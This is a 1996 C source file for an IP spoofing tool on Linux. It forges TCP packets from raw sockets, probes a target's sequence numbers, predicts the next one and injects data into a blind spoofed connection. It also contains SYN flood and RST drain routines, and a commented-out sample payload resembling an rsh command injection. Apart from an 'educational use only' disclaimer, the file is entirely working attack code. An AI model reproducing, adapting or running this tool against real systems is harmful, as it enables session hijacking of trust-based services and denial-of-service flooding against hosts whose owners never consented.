/* IP Spoof v0.34 for Linux 16-9-96
   Copyright 1996 /dev/null, devnull@klaphek.nl
   This software can be found at http://www.klaphek.nl/files.

   This software is just aplha demonstrationware, intended for educational
   use only. Therefore, I, the author, do not take any responsibility for
   any consequences of using this software. This software may blow up your
   computer, other peopless computers, get you arrested, etc., etc. You're
   warned, don't blame me!
   This software may be redistributed for non commercial use, provided that
   no modifications are made to either the source or this notice.
   People are encouraged to improve this code. Please mail me if you do so.
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <ctype.h>
#include <netdb.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/protocols.h>
#include <linux/if_ether.h>

#ifndef bool
#define bool u_long
#define false (0)
#define true  (1)
#endif

static int send_socket = 0;
static int recv_socket = 0;

unsigned long hostname_to_inet(char *hostname)
{
   unsigned long address;
   struct hostent *hostent;

   if (isdigit(*hostname))
   {
      if ((long int)(address = inet_addr(hostname)) == -1)
      {
         perror("hostname");
         return((unsigned long)-1);
      }
   }
   else
   {
      if (!(hostent = (struct hostent *)gethostbyname(hostname)))
      {
         perror("hostname");
         return((unsigned long)-1);
      }
      memcpy(&address, hostent->h_addr, sizeof(address));
   }
   return(address);
}


bool open_sockets()
{
   if ((send_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
   {
      perror("send socket");
      return(false);
   }
   if ((recv_socket = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP))) == -1)
   {
      perror("receive socket");
      return(false);
   }
   return(true);
}

bool init_sockets()
{
   int i;
   struct sockaddr sa;
   struct sockaddr_in *sa_in = (struct sockaddr_in *)&sa;

   i = 1;
   if (setsockopt(send_socket,IPPROTO_IP,IP_HDRINCL,(char*)&i,sizeof(i))<0)
   {
      perror("setsockopt IP_HDRINCL");
      return(false);
   };

   memset(&sa, 0 ,sizeof(sa));
   sa_in->sin_family = AF_INET;
   sa_in->sin_addr.s_addr = INADDR_ANY;
   if (connect(send_socket, &sa, sizeof(sa)) == -1)
   {
      perror("connect");
      return(false);
   }

   return(true);
}

void close_sockets()
{
   if (send_socket)
      close(send_socket);
   if (recv_socket)
      close(recv_socket);
}


u_short ip_sum16(u_short *data, u_short len)
{
   u_long long_sum;
   u_short sum;

   for(long_sum = 0; len; len--)
      long_sum += htons(data[len - 1]);
   sum = long_sum & 0xffff;
   sum += long_sum >> 16;
   return(sum);
}
   
#define send_syn(sh, dh, sp, dp, sq) \
   send_tcp_packet(sh, dh, sp, dp, sq, 0, TH_SYN, NULL, 0)

#define send_ack(sh, dh, sp, dp, sq, ac) \
   send_tcp_packet(sh, dh, sp, dp, sq, ac, TH_ACK, NULL, 0)

#define send_rst(sh, dh, sp, dp, sq, ac) \
   send_tcp_packet(sh, dh, sp, dp, sq, ac, TH_RST, NULL, 0)

bool send_tcp_packet(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long seq_nr, u_long ack_nr, u_char flags, u_char *data, u_short length)
{
   static u_char packet[1500];
   static struct iphdr *ipheader = (struct iphdr *)packet;
   static struct tcphdr *tcpheader = (struct tcphdr *)(packet + sizeof(struct iphdr));
   static u_char *options = packet + sizeof(struct iphdr) + sizeof(struct tcphdr);
   static struct
   {
      u_long saddr;
      u_long daddr;
      u_char zero;
      u_char proto;
      u_short len;
      u_short partial_check;
      u_short padding;
   } pseudo_header;
   u_char *data_start;
   u_short total_length; 

   tcpheader->th_sport = htons(source_port);
   tcpheader->th_dport = htons(dest_port);
   tcpheader->th_seq = htonl(seq_nr);
   tcpheader->th_ack = htonl(ack_nr);
   tcpheader->th_off = 5;
   data_start = options;

// set MSS when starting connection to small value to allow SLIP etc.
   if (flags & TH_SYN)
   {
       *(u_long *)options = htonl(0x02040100); 
       data_start += 4;
       tcpheader->th_off++;
   }
   tcpheader->th_flags = flags;
   tcpheader->th_win = htons(0x0200);
   tcpheader->th_sum = 0x0000;
   tcpheader->th_urp = 0x0000;

   memcpy(data_start, data, length);
   total_length = data_start - packet + length;
   if (total_length & 1)
      packet[total_length] = 0x00; 

   pseudo_header.saddr = source_host;
   pseudo_header.daddr = dest_host;
   pseudo_header.zero = 0;
   pseudo_header.proto = IP_TCP;
   pseudo_header.len = htons(total_length - sizeof(struct iphdr));
   pseudo_header.partial_check = htons(ip_sum16((u_short *)tcpheader, (total_length + 1 - sizeof(struct iphdr)) / 2));
   pseudo_header.padding = 0;
   tcpheader->th_sum = htons(~ip_sum16((u_short *)&pseudo_header, sizeof(pseudo_header) / 2));

   ipheader->version = 4;
   ipheader->ihl = 5;
   ipheader->tos = 0;
   ipheader->tot_len = htons(total_length);
   ipheader->id = 0x0000;            // filled in by kernel
   ipheader->frag_off = 0x0000;
   ipheader->ttl = 0xff;
   ipheader->protocol = IP_TCP;
   ipheader->check = 0x0000;         // filled in by kernel
   ipheader->saddr = source_host;
   ipheader->daddr = dest_host;

   if ((send(send_socket, packet, total_length, 0)) == -1)
   {
      perror("send");
      return(false);
   }
   return(true);
}
           
u_long recv_ack(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long seq_nr)
{
   u_char packet[1500];
   u_short ihl, length;
   struct ethhdr *ethhdr;
   struct iphdr *iphdr;
   struct tcphdr *tcphdr;

   while((length = recv(recv_socket, packet, 1500, 0)) > 0)
   {
      ethhdr = (struct ethhdr *)packet;
      if (ethhdr->h_proto != htons(ETH_P_IP))
         continue;
 
      iphdr = (struct iphdr *)(packet + 0x0e);
      if ((iphdr->version != 4) || (iphdr->protocol != IP_TCP))
         continue;
      if ((iphdr->saddr != source_host) || (iphdr->daddr != dest_host))
         continue;

      ihl = iphdr->ihl * 4;
      tcphdr = (struct tcphdr *)((u_char *)iphdr + ihl);
      if ((ntohs(tcphdr->th_sport) != source_port) || (ntohs(tcphdr->th_dport) != dest_port))
         continue;
      if (ntohl(tcphdr->th_ack) != seq_nr)
         continue;

      if (tcphdr->th_flags & TH_RST)
      {
         fprintf(stderr, "Probe reset by peer\n");
         return(0);
      }
      if (tcphdr->th_flags != (TH_SYN | TH_ACK))
         continue;

//   printf("Received SYN ACK from %08x.%04x to %08x.%04x: %08x - %08x\n",ntohl(iphdr->saddr), ntohs(tcphdr->th_sport), ntohl(iphdr->daddr), ntohs(tcphdr->th_dport), ntohl(tcphdr->th_seq), ntohl(tcphdr->th_ack));

      return(ntohl(tcphdr->th_seq));       
   }
   return(0);
}

void flood_host(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long start_seq, int count)
{
   int i;

   for (i = 0; i < count; i++)
      send_syn(source_host, dest_host, source_port++, dest_port, start_seq++);
}

void drain_host(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long start_seq, int count)
{
   int i;

   for (i = 0; i < count; i++)
      send_rst(source_host, dest_host, source_port++, dest_port, start_seq++, 0);
}

void determine_acks(u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long start_seq, int probes)
{
#define MAX_PROBES 16
   u_long acks[MAX_PROBES];
   int i;

   if (probes > MAX_PROBES) 
      probes =  MAX_PROBES;

   for(i = 0; i < probes; i++)
      send_syn(source_host, dest_host, source_port, dest_port, start_seq++);
   for(i = 0; i < probes; i++)
   {
      if (!(acks[i] = recv_ack(dest_host, source_host, dest_port, source_port++, start_seq)))
         return;
   }
   for(i = 0; i < probes; i++)
   {
      printf("ACK: %08lx", acks[i]);
      if (i > 0)
         printf(", difference: %lu", acks[i] - acks[i - 1]);
      printf("\n");
   }
}

bool spoof_connection(u_long local_host, u_long source_host, u_long dest_host, u_short source_port, u_short dest_port, u_long start_seq, u_long update, char *data, u_short data_len)
{
   //char *data = "\0bakker\0bakker\0touch madeit\0";
   //int data_len = 28;
   u_short local_port = 0x03ff;
   //u_long start_ack;
   u_long probe_seq, con_seq, probe_ack, con_ack;

   probe_seq = start_seq;
   con_seq = start_seq + 64000;

   if (!send_syn(local_host, dest_host, local_port, dest_port, probe_seq++))
      return(false);

   if (!send_syn(source_host, dest_host, source_port, dest_port, con_seq++))
      return(false);

   if (!(probe_ack = recv_ack(dest_host, local_host, dest_port, local_port, probe_seq)))
      return(false);

   printf("probe returns sequence nr %08lx\n", probe_ack);
   con_ack = probe_ack + update + 1;

//   if (!send_syn(source_host, dest_host, source_port, dest_port, con_seq++))
//      return(false);

   usleep(5000);
   printf("trying sequence nr %08lx\n", con_ack);
   fflush(stdout);
   if (!send_ack(source_host, dest_host, source_port, dest_port, con_seq, con_ack))
      return(false);    
   
   printf("sending %d bytes of data\n", data_len);
   fflush(stdout);
   if (!send_tcp_packet(source_host, dest_host, source_port, dest_port, con_seq++, con_ack, TH_ACK, data, data_len))
      return(false);

   sleep(3);
   printf("reseting connection\n");
   fflush(stdout);
   if (!send_rst(source_host, dest_host, source_port, dest_port, con_seq, ++con_ack))
      return(false);

   printf("done!");
   fflush(stdout);
   return(true);
}


int main(int argc, char **argv)
{
   char *progname, *sourcehost, *desthost;
   char localhost[256];
   u_long local_addr, source_addr, dest_addr;
   u_short source_port, dest_port;
   u_long seq_nr, count;
   char data[256];
   u_short length;

   progname = strrchr(argv[0], '/');
   if (progname)
      progname++;
   else
      progname = argv[0];

   if (argc < 7)
   {
      fprintf(stderr,"%s source-ip dest-ip src-port dest-port seq_nr update < data\n", progname);
      exit(1);
   }

   for(length = 0; !feof(stdin) && !ferror(stdin); length++)
      data[length] = getchar();
   length--;
   
   if (gethostname(localhost, 256) == -1)
   {
       perror("gethostname");
       exit(1);
   } 
   sourcehost = argv[1];
   desthost = argv[2];
   source_port = strtoul(argv[3], (char **)NULL, 0) & 0xffff;
   dest_port = strtoul(argv[4], (char **)NULL, 0) & 0xffff;
   seq_nr = strtoul(argv[5], (char **)NULL, 0);
   count = strtoul(argv[6], (char **)NULL, 0);

   if (!open_sockets())
   {
      close_sockets();
      exit(2);
   }
   if (!init_sockets())
   {
      close_sockets();
      exit(3);
   }

   local_addr = hostname_to_inet(localhost);
   source_addr = hostname_to_inet(sourcehost);
   dest_addr = hostname_to_inet(desthost);

   spoof_connection(local_addr, source_addr, dest_addr, source_port, dest_port, seq_nr, count, data, length);

//   flood_host(source_addr, dest_addr, source_port, dest_port, seq_nr, count);   

//   drain_host(source_addr, dest_addr, source_port, dest_port, seq_nr, count);   

//   determine_acks(source_addr, dest_addr, source_port, dest_port, seq_nr, count);

   close_sockets();
   return(0);
}

